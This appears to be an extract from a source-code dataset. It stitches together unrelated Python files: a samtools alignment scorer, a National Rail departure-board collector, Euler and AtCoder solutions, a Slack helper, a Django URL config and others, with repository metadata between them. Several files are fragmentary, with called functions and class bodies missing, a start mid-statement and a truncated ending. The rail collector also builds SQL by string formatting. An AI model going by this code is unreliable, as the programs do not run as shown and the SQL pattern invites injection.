seq_filename, reads_filename),
stdout=subprocess.PIPE)
subprocess.check_output(('samtools', 'sort',
'-@%i' % num_threads,
'-o', bam_filename, '-'),
stdin=prc.stdout)
prc.wait()
# Generate and analyse variants file:
prc = subprocess.Popen(['samtools',
'mpileup',
'-uvf',
seq_filename,
'-t', 'DP',
'-o', vcf_filename,
bam_filename])
prc.communicate()
vcf_utils.analyse(vcf_filename, seq_id, barcodes, write_queue)
print('Scored: %s against %s' % (reads_filename, seq_id))
def _get_seq_files(filename):
'''Get seq files.'''
seq_files = {}
if os.path.isdir(filename):
for fle in os.listdir(filename):
name, ext = os.path.splitext(os.path.basename(fle))
if ext == '.fasta':
seq_files[name] = os.path.join(filename, fle)
else:
seq_files[os.path.splitext(os.path.basename(filename))[0]] = filename
return seq_files
def main(args):
'''main method.'''
seq_files = {}
for seq_file in args[6:]:
seq_files.update(_get_seq_files(seq_file))
aligner = PathwayAligner(out_dir=os.path.join(args[0], str(uuid.uuid4())),
in_dir=args[1],
seq_files=seq_files,
min_length=int(args[2]),
max_read_files=int(args[3]))
aligner.score_alignments(int(args[4]), num_threads=int(args[5]))
if __name__ == '__main__':
main(sys.argv[1:])
| 34.139665 | 79 | 0.540992 |
fec13c651d52b40a5f2248b2a3733321fd5d2e54 | 3,815 | py | Python | railcollector.py | DanteLore/national-rail | 8c60178ea2c1b71438c36cfdae7df808db5c374b | [
"MIT"
] | 14 | 2018-07-12T10:43:00.000Z | 2019-10-19T07:10:59.000Z | railcollector.py | DanteLore/national-rail | 8c60178ea2c1b71438c36cfdae7df808db5c374b | [
"MIT"
] | null | null | null | railcollector.py | DanteLore/national-rail | 8c60178ea2c1b71438c36cfdae7df808db5c374b | [
"MIT"
] | 3 | 2019-07-15T14:32:00.000Z | 2020-02-12T17:53:21.000Z | import argparse
from time import sleep
import requests
import xmltodict
# http://www.nationalrail.co.uk/100296.aspx
# https://lite.realtime.nationalrail.co.uk/OpenLDBWS/
# http://zetcode.com/db/sqlitepythontutorial/
from utils.database import insert_into_db, delete_where, execute_sql
xml_payload = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://thalesgroup.com/RTTI/2016-02-16/ldb/" xmlns:ns2="http://thalesgroup.com/RTTI/2013-11-28/Token/types">
<SOAP-ENV:Header>
<ns2:AccessToken>
<ns2:TokenValue>{KEY}</ns2:TokenValue>
</ns2:AccessToken>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:GetDepBoardWithDetailsRequest>
<ns1:numRows>12</ns1:numRows>
<ns1:crs>{CRS}</ns1:crs>
<ns1:timeWindow>120</ns1:timeWindow>
</ns1:GetDepBoardWithDetailsRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""
# url: The URL of the service
# key: Your National Rail API key
# crs: Station code (e.g. THA or PAD)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='National Rail Data Collector')
parser.add_argument('--key', help='API Key', required=True)
parser.add_argument('--url', help='API URL', default="http://lite.realtime.nationalrail.co.uk/OpenLDBWS/ldb9.asmx")
parser.add_argument('--crs', help='CRS Station Code (default is Thatcham)', default="THA")
parser.add_argument('--db', help='SQLite DB Name', default="data/trains.db")
args = parser.parse_args()
execute_sql(args.db, "create table if not exists departures (crs TEXT, platform TEXT, std TEXT, etd TEXT, origin TEXT, destination TEXT, calling_points TEXT);")
crs_list = args.crs.split(",")
while True:
for crs in crs_list:
try:
print "Processing station '{0}'".format(crs)
departures = fetch_trains(args.url, args.key, crs)
delete_where(args.db, "departures", "crs == '{0}'".format(crs))
insert_into_db(args.db, "departures", departures)
sleep(1)
except Exception as e:
print e.message
sleep(10)
| 38.15 | 197 | 0.623853 |
fec152e2fa033df2f5583f6a022b052c96a15f0b | 877 | py | Python | src/problem12.py | aitc-h/euler | 6fc07c741c31a632ce6f11f65c11007cd6c7eb29 | [
"MIT"
] | null | null | null | src/problem12.py | aitc-h/euler | 6fc07c741c31a632ce6f11f65c11007cd6c7eb29 | [
"MIT"
] | null | null | null | src/problem12.py | aitc-h/euler | 6fc07c741c31a632ce6f11f65c11007cd6c7eb29 | [
"MIT"
] | null | null | null | """
Problem 12
Highly divisible triangular number
"""
from utility.decorators import timeit, printit
from utility.math_f import sum_naturals_to_n, get_divisors
from math import ceil, sqrt
if __name__ == "__main__":
n = 500
run(n)
| 23.078947 | 81 | 0.575827 |
fec193e201ee4720e007a3de6a116f0b7db806c8 | 469 | py | Python | atcoder/abc183D_water_heater.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 31 | 2020-05-13T01:07:55.000Z | 2021-07-13T07:53:26.000Z | atcoder/abc183D_water_heater.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 10 | 2020-05-20T07:22:09.000Z | 2021-07-19T03:52:13.000Z | atcoder/abc183D_water_heater.py | uninhm/kyopro | bf6ed9cbf6a5e46cde0291f7aa9d91a8ddf1f5a3 | [
"BSD-3-Clause"
] | 14 | 2020-05-11T05:58:36.000Z | 2021-12-07T03:20:43.000Z | # uninhm
# https://atcoder.jp/contests/abc183/tasks/abc183_d
# data structures, sorting
n, w = map(int, input().split())
needed = []
for _ in range(n):
s, t, p = map(int, input().split())
needed.append((s, p))
needed.append((t, -p))
needed.sort()
cum = 0
for i in range(len(needed)):
cum += needed[i][1]
if i != len(needed)-1 and needed[i+1][0] == needed[i][0]:
continue
if cum > w:
print("No")
quit()
print("Yes")
| 18.038462 | 61 | 0.558635 |
fec1c9c0fc7bf9b096e6c493b061466eec3c8572 | 635 | py | Python | inc/ReiSlack.py | REI-Systems/REISystems-OGPS-NYC-heartbeat | 126ffd4ee2e80f346b00c3b2241d30c6ce7d93c0 | [
"Apache-2.0"
] | null | null | null | inc/ReiSlack.py | REI-Systems/REISystems-OGPS-NYC-heartbeat | 126ffd4ee2e80f346b00c3b2241d30c6ce7d93c0 | [
"Apache-2.0"
] | null | null | null | inc/ReiSlack.py | REI-Systems/REISystems-OGPS-NYC-heartbeat | 126ffd4ee2e80f346b00c3b2241d30c6ce7d93c0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
from slackclient import SlackClient
| 24.423077 | 79 | 0.609449 |
fec30b1306550fa1e0b5402e2443b04d91d4ab0b | 678 | py | Python | examples/human.py | VetoProjects/AudioPython | 18f5e2c10158bf8cfd15fceb84240a420bf9c677 | [
"MIT"
] | 8 | 2015-04-28T15:31:44.000Z | 2017-02-24T22:57:37.000Z | examples/human.py | VetoProjects/AudioPython | 18f5e2c10158bf8cfd15fceb84240a420bf9c677 | [
"MIT"
] | null | null | null | examples/human.py | VetoProjects/AudioPython | 18f5e2c10158bf8cfd15fceb84240a420bf9c677 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Idea taken from www.wavepot.com
import math
from AudioPython import *
from AudioPython.dsp import *
n = 44100 / 500
channels = ((sub(bass_osc(n), 0.3),),)
samples = compute_samples(channels)
write_wavefile("temp.wav", samples)
| 21.870968 | 79 | 0.59587 |
fec502d06e7f6b4c2323778a4f480e3ca87b83f7 | 243 | py | Python | appointment_booking/appointment_booking/doctype/visitor_appointment/tasks.py | smarty-india/appointment_booking | 781b8883b749d78d543b21f39f9c1a12f16033ae | [
"MIT"
] | 1 | 2021-02-10T05:13:29.000Z | 2021-02-10T05:13:29.000Z | appointment_booking/appointment_booking/doctype/visitor_appointment/tasks.py | smarty-india/appointment_booking | 781b8883b749d78d543b21f39f9c1a12f16033ae | [
"MIT"
] | null | null | null | appointment_booking/appointment_booking/doctype/visitor_appointment/tasks.py | smarty-india/appointment_booking | 781b8883b749d78d543b21f39f9c1a12f16033ae | [
"MIT"
] | 7 | 2020-09-23T13:10:29.000Z | 2021-12-28T19:03:34.000Z | import frappe | 34.714286 | 72 | 0.740741 |
fec6c828f7c2c56e87c8344597efe1d8c44178c3 | 986 | py | Python | hood/urls.py | virginiah894/Hood-alert | 9c00ca7e4bec3d8c46ff4b9b74f2f770f1c60873 | [
"MIT"
] | 1 | 2020-03-10T18:01:51.000Z | 2020-03-10T18:01:51.000Z | hood/urls.py | virginiah894/Hood-alert | 9c00ca7e4bec3d8c46ff4b9b74f2f770f1c60873 | [
"MIT"
] | 4 | 2020-06-06T01:09:13.000Z | 2021-09-08T01:36:28.000Z | hood/urls.py | virginiah894/Hood-alert | 9c00ca7e4bec3d8c46ff4b9b74f2f770f1c60873 | [
"MIT"
] | null | null | null | from django.urls import path , include
from . import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('', views.home,name='home'),
path('profile/', views.profile , name = 'profile'),
path('update_profile/',views.update_profile,name='update'),
path('updates/', views.updates, name='updates'),
path('new/update', views.new_update, name = 'newUpdate'),
path('posts', views.post, name='post'),
path('new/post', views.new_post, name='newPost'),
path('health', views.hosy, name='hosy'),
path('search', views.search_results, name = 'search_results'),
path('adminst', views.administration, name='admin'),
path('business', views.local_biz, name='biz'),
path('new/business', views.new_biz, name='newBiz'),
path('create/profile',views.create_profile, name='createProfile'),
]
if settings.DEBUG:
urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT) | 30.8125 | 81 | 0.684584 |
fec70c2989068076b5623aeccec1da14a757918e | 962 | py | Python | base/client/TargetTracker.py | marlamade/generals-bot | b485e416a2c4fc307e7d015ecdb70e278c4c1417 | [
"MIT"
] | null | null | null | base/client/TargetTracker.py | marlamade/generals-bot | b485e416a2c4fc307e7d015ecdb70e278c4c1417 | [
"MIT"
] | null | null | null | base/client/TargetTracker.py | marlamade/generals-bot | b485e416a2c4fc307e7d015ecdb70e278c4c1417 | [
"MIT"
] | null | null | null | from typing import List
from .tile import Tile
| 29.151515 | 92 | 0.591476 |
fec8bbb3f41ea8513300db1174bf26c5ac72fcf6 | 7,546 | py | Python | chatbrick/brick/shortener.py | BluehackRano/cb-wh | ecf11100ad83df71eac9d56f6abbd59ceeda9d83 | [
"MIT"
] | null | null | null | chatbrick/brick/shortener.py | BluehackRano/cb-wh | ecf11100ad83df71eac9d56f6abbd59ceeda9d83 | [
"MIT"
] | null | null | null | chatbrick/brick/shortener.py | BluehackRano/cb-wh | ecf11100ad83df71eac9d56f6abbd59ceeda9d83 | [
"MIT"
] | 1 | 2019-03-05T06:50:11.000Z | 2019-03-05T06:50:11.000Z | import logging
import time
import blueforge.apis.telegram as tg
import requests
import urllib.parse
import json
from blueforge.apis.facebook import Message, ImageAttachment, QuickReply, QuickReplyTextItem, TemplateAttachment, \
GenericTemplate, Element, PostBackButton, ButtonTemplate, UrlButton
logger = logging.getLogger(__name__)
BRICK_DEFAULT_IMAGE = 'https://www.chatbrick.io/api/static/brick/img_brick_20_001.png'
| 37.542289 | 115 | 0.373178 |
fec8fbc55d1af1209c9e7e098a82c13f771956eb | 1,195 | py | Python | ask/qa/models.py | nikitabray/web | ef2e1a6ed2e917b0398622c488be2f222742b882 | [
"Unlicense"
] | null | null | null | ask/qa/models.py | nikitabray/web | ef2e1a6ed2e917b0398622c488be2f222742b882 | [
"Unlicense"
] | null | null | null | ask/qa/models.py | nikitabray/web | ef2e1a6ed2e917b0398622c488be2f222742b882 | [
"Unlicense"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.urls import reverse
# Create your models here.
| 31.447368 | 103 | 0.708787 |
fec9f02854eb9eb4fafaedb66ec68d2f2a2ba154 | 152 | py | Python | meuCursoEmVideo/mundo1/ex008.py | FelipeSilveiraL/EstudoPython | 8dc6cb70415badd180a1375da68f9dc9cb8fc8df | [
"MIT"
] | null | null | null | meuCursoEmVideo/mundo1/ex008.py | FelipeSilveiraL/EstudoPython | 8dc6cb70415badd180a1375da68f9dc9cb8fc8df | [
"MIT"
] | null | null | null | meuCursoEmVideo/mundo1/ex008.py | FelipeSilveiraL/EstudoPython | 8dc6cb70415badd180a1375da68f9dc9cb8fc8df | [
"MIT"
] | null | null | null | n = float(input("informe um medida em metros: "));
cm = n * 100
mm = n * 1000
print('A medida {}M correspondente a {}Cm e {}Mm'.format(n, cm, mm)) | 21.714286 | 70 | 0.605263 |
fecbabb08af60d46436a84bbcfcf8d984bfc2f0d | 301 | py | Python | import_descendants/test_example/__init__.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | null | null | null | import_descendants/test_example/__init__.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | null | null | null | import_descendants/test_example/__init__.py | ZumatechLtd/import-descendants | ad3dd65ae74dd98ae1eec68fad3b1fa775a5d74f | [
"Unlicense"
] | 1 | 2020-03-23T13:59:40.000Z | 2020-03-23T13:59:40.000Z | # -*- coding: utf-8 -*-
# (c) 2013 Bright Interactive Limited. All rights reserved.
# http://www.bright-interactive.com | info@bright-interactive.com
from import_descendants import import_descendants
import sys
this_module = sys.modules[__name__]
import_descendants(this_module, globals(), locals())
| 33.444444 | 65 | 0.774086 |
feccebf8b7f5ab31a62544c1a696cbcf12f4d112 | 1,264 | py | Python | DelibeRating/DelibeRating/env/Lib/site-packages/tests/test_widgets.py | Severose/DelibeRating | 5d227f35c071477ce3fd6fbf3ab13a44d13f6e08 | [
"MIT"
] | 1 | 2018-11-01T15:05:12.000Z | 2018-11-01T15:05:12.000Z | DelibeRating/DelibeRating/env/Lib/site-packages/tests/test_widgets.py | Severose/DelibeRating | 5d227f35c071477ce3fd6fbf3ab13a44d13f6e08 | [
"MIT"
] | null | null | null | DelibeRating/DelibeRating/env/Lib/site-packages/tests/test_widgets.py | Severose/DelibeRating | 5d227f35c071477ce3fd6fbf3ab13a44d13f6e08 | [
"MIT"
] | null | null | null | import pytest
from tempus_dominus import widgets
| 28.088889 | 58 | 0.761867 |
fece96dc896e75a634255768c6898114b3c6f1c0 | 9,568 | py | Python | maps/foliumMaps.py | selinerguncu/Yelp-Spatial-Analysis | befbcb927ef225bda9ffaea0fd41a88344f9693c | [
"MIT"
] | null | null | null | maps/foliumMaps.py | selinerguncu/Yelp-Spatial-Analysis | befbcb927ef225bda9ffaea0fd41a88344f9693c | [
"MIT"
] | null | null | null | maps/foliumMaps.py | selinerguncu/Yelp-Spatial-Analysis | befbcb927ef225bda9ffaea0fd41a88344f9693c | [
"MIT"
] | null | null | null | import folium
from folium import plugins
import numpy as np
import sqlite3 as sqlite
import os
import sys
import pandas as pd
#extract data from yelp DB and clean it:
DB_PATH = "/Users/selinerguncu/Desktop/PythonProjects/Fun Projects/Yelp/data/yelpCleanDB.sqlite"
conn = sqlite.connect(DB_PATH)
#######################################
############ organize data ############
#######################################
#######################################
##### visualize the coordinates #######
#######################################
#######################################
####### cluster nearby points #########
#######################################
# saving the map as an image doesnt seem to work
# import os
# import time
# from selenium import webdriver
# from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# # for different tiles: https://github.com/python-visualization/folium
# delay=5
# fn='foliumHeatmap.html'
# tmpurl='file:///Users/selinerguncu/Desktop/PythonProjects/Fun%20Projects/Yelp%20Project/Simulation/foliumHeatmap.html'.format(path=os.getcwd(),mapfile=fn)
# mapa.save(fn)
# firefox_capabilities = DesiredCapabilities.FIREFOX
# firefox_capabilities['marionette'] = True
# browser = webdriver.Firefox(capabilities=firefox_capabilities, executable_path='/Users/selinerguncu/Downloads/geckodriver')
# browser.get(tmpurl)
# #Give the map tiles some time to load
# time.sleep(delay)
# browser.save_screenshot('mynewmap.png')
# browser.quit()
| 44.502326 | 302 | 0.666074 |
fecede72453f312f65abb3c7e2bbaa8b798ac96a | 352 | py | Python | telethon/client/telegramclient.py | chrizrobert/Telethon | 99711457213a2bb1a844830a3c57536c5fa9b1c2 | [
"MIT"
] | 1 | 2018-10-07T08:31:49.000Z | 2018-10-07T08:31:49.000Z | telethon/client/telegramclient.py | chrizrobert/Telethon | 99711457213a2bb1a844830a3c57536c5fa9b1c2 | [
"MIT"
] | null | null | null | telethon/client/telegramclient.py | chrizrobert/Telethon | 99711457213a2bb1a844830a3c57536c5fa9b1c2 | [
"MIT"
] | 1 | 2018-09-05T14:59:27.000Z | 2018-09-05T14:59:27.000Z | from . import (
UpdateMethods, AuthMethods, DownloadMethods, DialogMethods,
ChatMethods, MessageMethods, UploadMethods, MessageParseMethods,
UserMethods
)
| 25.142857 | 68 | 0.775568 |
fecf4c8aeffd0ce28d05065c07b1a272ca60037e | 1,529 | py | Python | great_expectations/data_context/data_context/explorer_data_context.py | andyjessen/great_expectations | 74f7f2aa7b51144f34156ed49490dae4edaa5cb7 | [
"Apache-2.0"
] | null | null | null | great_expectations/data_context/data_context/explorer_data_context.py | andyjessen/great_expectations | 74f7f2aa7b51144f34156ed49490dae4edaa5cb7 | [
"Apache-2.0"
] | null | null | null | great_expectations/data_context/data_context/explorer_data_context.py | andyjessen/great_expectations | 74f7f2aa7b51144f34156ed49490dae4edaa5cb7 | [
"Apache-2.0"
] | null | null | null | import logging
from ruamel.yaml import YAML
from great_expectations.data_context.data_context.data_context import DataContext
logger = logging.getLogger(__name__)
yaml = YAML()
yaml.indent(mapping=2, sequence=4, offset=2)
yaml.default_flow_style = False
| 33.23913 | 119 | 0.688685 |
fecf532f1524b2d286c4ac2038b09f2f317636bc | 406 | py | Python | rio_cogeo/errors.py | vincentsarago/rio-cogeo | a758c7befa394568daa7d926c331b5489753a694 | [
"BSD-3-Clause"
] | 159 | 2019-02-12T18:22:30.000Z | 2022-03-23T18:49:47.000Z | rio_cogeo/errors.py | vincentsarago/rio-cogeo | a758c7befa394568daa7d926c331b5489753a694 | [
"BSD-3-Clause"
] | 121 | 2019-01-28T18:00:18.000Z | 2022-03-31T17:54:42.000Z | rio_cogeo/errors.py | vincentsarago/rio-cogeo | a758c7befa394568daa7d926c331b5489753a694 | [
"BSD-3-Clause"
] | 27 | 2019-02-12T23:52:33.000Z | 2022-03-07T14:40:24.000Z | """Rio-Cogeo Errors and Warnings."""
| 22.555556 | 66 | 0.738916 |
fecfe168fd1f83e2b06ca1bb819712b3c0b0b0b9 | 293 | py | Python | src/songbook/console/_update.py | kipyin/- | 5d372c7d987e6a1da380197c1b990def0d240298 | [
"MIT"
] | 1 | 2021-01-03T10:40:28.000Z | 2021-01-03T10:40:28.000Z | src/songbook/console/_update.py | kipyin/- | 5d372c7d987e6a1da380197c1b990def0d240298 | [
"MIT"
] | null | null | null | src/songbook/console/_update.py | kipyin/- | 5d372c7d987e6a1da380197c1b990def0d240298 | [
"MIT"
] | 1 | 2021-01-03T10:40:29.000Z | 2021-01-03T10:40:29.000Z | import click
| 10.851852 | 30 | 0.675768 |
fecfe7347f543cbcfbae4629f1a3340b7de24b39 | 1,367 | py | Python | util/rmcompile.py | likwoka/ak | e6ac14e202e5a0d8f1b57e3e1a5c5a1ed9ecc14b | [
"Apache-2.0"
] | null | null | null | util/rmcompile.py | likwoka/ak | e6ac14e202e5a0d8f1b57e3e1a5c5a1ed9ecc14b | [
"Apache-2.0"
] | null | null | null | util/rmcompile.py | likwoka/ak | e6ac14e202e5a0d8f1b57e3e1a5c5a1ed9ecc14b | [
"Apache-2.0"
] | null | null | null | '''
Copyright (c) Alex Li 2003. All rights reserved.
'''
__version__ = '0.1'
__file__ = 'rmcompile.py'
import os, getopt, sys
EXTLIST = ['.ptlc', '.pyc']
usage = '''\nUsage: $python %s [OPTION] dir
Remove all .pyc and .ptlc files in the directory recursively.
Options:
-h, --help display this message\n''' % __file__
if __name__ == '__main__':
sys.exit(main())
| 21.030769 | 64 | 0.547184 |
fed030e5255f1c16fe14660b2bdc69ee621a5da4 | 706 | py | Python | app/integrations/opsgenie.py | cds-snc/sre-bot | b34cdaba357fccbcdbaac1e1ac70ebbe408d7316 | [
"MIT"
] | null | null | null | app/integrations/opsgenie.py | cds-snc/sre-bot | b34cdaba357fccbcdbaac1e1ac70ebbe408d7316 | [
"MIT"
] | 12 | 2022-02-21T18:57:07.000Z | 2022-03-31T03:06:48.000Z | app/integrations/opsgenie.py | cds-snc/sre-bot | b34cdaba357fccbcdbaac1e1ac70ebbe408d7316 | [
"MIT"
] | null | null | null | import json
import os
from urllib.request import Request, urlopen
OPSGENIE_KEY = os.getenv("OPSGENIE_KEY", None)
| 28.24 | 81 | 0.651558 |
fed05ac1dfedd9e75b62b9d7eec9b45bc5c84bcd | 366 | py | Python | observatorio/dados/migrations/0007_auto_20201007_1720.py | guerrasao/Observatorio-Socioeconomico-da-COVID-19 | 15457859092a41e539e57af6cc1bc875f3fbdf93 | [
"MIT"
] | null | null | null | observatorio/dados/migrations/0007_auto_20201007_1720.py | guerrasao/Observatorio-Socioeconomico-da-COVID-19 | 15457859092a41e539e57af6cc1bc875f3fbdf93 | [
"MIT"
] | null | null | null | observatorio/dados/migrations/0007_auto_20201007_1720.py | guerrasao/Observatorio-Socioeconomico-da-COVID-19 | 15457859092a41e539e57af6cc1bc875f3fbdf93 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.1 on 2020-10-07 20:20
from django.db import migrations
| 20.333333 | 54 | 0.612022 |
fed3744cb0d9a7b7d5b538e2e8bb1083ab7dd9b2 | 688 | py | Python | Part 1 - Data Preprocessing/data_preprocessing.py | Tatvam/Machine-Learning | a18d3f541d99a8fb0cfbe89df358a11d3121b4f5 | [
"MIT"
] | null | null | null | Part 1 - Data Preprocessing/data_preprocessing.py | Tatvam/Machine-Learning | a18d3f541d99a8fb0cfbe89df358a11d3121b4f5 | [
"MIT"
] | null | null | null | Part 1 - Data Preprocessing/data_preprocessing.py | Tatvam/Machine-Learning | a18d3f541d99a8fb0cfbe89df358a11d3121b4f5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 8 15:15:29 2018
@author: tatvam
importing the libraries
"""
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# import the dataset
dataset = pd.read_csv("Data.csv")
X = dataset.iloc[:, :-1].values
Y = dataset.iloc[:, 3].values
# Splitting the data into training set and test set
from sklearn.model_selection import train_test_split
X_train,X_test,Y_train,Y_test = train_test_split(X,Y, test_size = 0.2, random_state = 0)
"""# feature scaling
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)""" | 22.933333 | 88 | 0.741279 |
fed3cd8321c318f2dc707c9994a2ee0cad04c478 | 785 | py | Python | qiniu_ufop/management/commands/createproject.py | Xavier-Lam/qiniu-ufop | 02c6119c69637cb39e2b73a915e68b77afa07fe3 | [
"MIT"
] | 5 | 2019-06-10T12:53:41.000Z | 2020-12-06T02:57:37.000Z | qiniu_ufop/management/commands/createproject.py | Xavier-Lam/qiniu-ufop | 02c6119c69637cb39e2b73a915e68b77afa07fe3 | [
"MIT"
] | null | null | null | qiniu_ufop/management/commands/createproject.py | Xavier-Lam/qiniu-ufop | 02c6119c69637cb39e2b73a915e68b77afa07fe3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from distutils.dir_util import copy_tree
from kombu.utils.objects import cached_property
import qiniu_ufop
from ..base import BaseCommand
| 28.035714 | 75 | 0.657325 |
fed4560e0eada1a8875a46b508b9927cb620d08a | 8,991 | py | Python | jenkinsapi_tests/unittests/test_nodes.py | kkpattern/jenkinsapi | 6b0091c5f44e4473c0a3d5addbfdc416bc6515ca | [
"MIT"
] | 556 | 2016-07-27T03:42:48.000Z | 2022-03-31T15:05:19.000Z | jenkinsapi_tests/unittests/test_nodes.py | kkpattern/jenkinsapi | 6b0091c5f44e4473c0a3d5addbfdc416bc6515ca | [
"MIT"
] | 366 | 2016-07-24T02:51:45.000Z | 2022-03-24T17:02:45.000Z | jenkinsapi_tests/unittests/test_nodes.py | kkpattern/jenkinsapi | 6b0091c5f44e4473c0a3d5addbfdc416bc6515ca | [
"MIT"
] | 308 | 2016-08-01T03:35:45.000Z | 2022-03-31T01:06:57.000Z | import pytest
from jenkinsapi.jenkins import Jenkins
from jenkinsapi.nodes import Nodes
from jenkinsapi.node import Node
DATA0 = {
'assignedLabels': [{}],
'description': None,
'jobs': [],
'mode': 'NORMAL',
'nodeDescription': 'the master Jenkins node',
'nodeName': '',
'numExecutors': 2,
'overallLoad': {},
'primaryView': {'name': 'All', 'url': 'http://halob:8080/'},
'quietingDown': False,
'slaveAgentPort': 0,
'unlabeledLoad': {},
'useCrumbs': False,
'useSecurity': False,
'views': [
{'name': 'All', 'url': 'http://halob:8080/'},
{'name': 'FodFanFo', 'url': 'http://halob:8080/view/FodFanFo/'}
]
}
DATA1 = {
'busyExecutors': 0,
'computer': [
{
'actions': [],
'displayName': 'master',
'executors': [{}, {}],
'icon': 'computer.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 0},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/var/lib/jenkins',
'size': 671924924416
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 0},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 3174686720,
'availableSwapSpace': 17163087872,
'totalPhysicalMemory': 16810180608,
'totalSwapSpace': 17163087872
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 671924924416
}
},
'numExecutors': 2,
'offline': False,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
},
{
'actions': [],
'displayName': 'bobnit',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 4261},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/home/sal/jenkins',
'size': 169784860672
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 29},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 4570710016,
'availableSwapSpace': 12195983360,
'totalPhysicalMemory': 8374497280,
'totalSwapSpace': 12195983360
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 249737277440
}
},
'numExecutors': 1,
'offline': True,
'offlineCause': {},
'oneOffExecutors': [],
'temporarilyOffline': False
},
{
'actions': [],
'displayName': 'halob',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': True,
'launchSupported': False,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': None,
'hudson.node_monitors.ClockMonitor': None,
'hudson.node_monitors.DiskSpaceMonitor': None,
'hudson.node_monitors.ResponseTimeMonitor': None,
'hudson.node_monitors.SwapSpaceMonitor': None,
'hudson.node_monitors.TemporarySpaceMonitor': None
},
'numExecutors': 1,
'offline': True,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
],
'displayName': 'nodes',
'totalExecutors': 2
}
DATA2 = {
'actions': [],
'displayName': 'master',
'executors': [{}, {}],
'icon': 'computer.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 0},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/var/lib/jenkins',
'size': 671942561792
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 0},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 2989916160,
'availableSwapSpace': 17163087872,
'totalPhysicalMemory': 16810180608,
'totalSwapSpace': 17163087872
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 671942561792
}
},
'numExecutors': 2,
'offline': False,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
DATA3 = {
'actions': [],
'displayName': 'halob',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': True,
'launchSupported': False,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': None,
'hudson.node_monitors.ClockMonitor': None,
'hudson.node_monitors.DiskSpaceMonitor': None,
'hudson.node_monitors.ResponseTimeMonitor': None,
'hudson.node_monitors.SwapSpaceMonitor': None,
'hudson.node_monitors.TemporarySpaceMonitor': None},
'numExecutors': 1,
'offline': True,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
def fake_node_poll(self, tree=None): # pylint: disable=unused-argument
"""
Fakes a poll of data by returning the correct section of the DATA1 test block.
"""
for node_poll in DATA1['computer']:
if node_poll['displayName'] == self.name:
return node_poll
return DATA2
| 30.686007 | 82 | 0.571015 |
fed6388f5baf349f9563436e423b3f0bfd27a9e9 | 790 | py | Python | message_gen/legacy/messages/ClientGetCloudHostResponse.py | zadjii/nebula | 50c4ec019c9f7eb15fe105a6c53a8a12880e281c | [
"MIT"
] | 2 | 2020-04-15T11:20:59.000Z | 2021-05-12T13:01:36.000Z | message_gen/legacy/messages/ClientGetCloudHostResponse.py | zadjii/nebula | 50c4ec019c9f7eb15fe105a6c53a8a12880e281c | [
"MIT"
] | 1 | 2018-06-05T04:48:56.000Z | 2018-06-05T04:48:56.000Z | message_gen/legacy/messages/ClientGetCloudHostResponse.py | zadjii/nebula | 50c4ec019c9f7eb15fe105a6c53a8a12880e281c | [
"MIT"
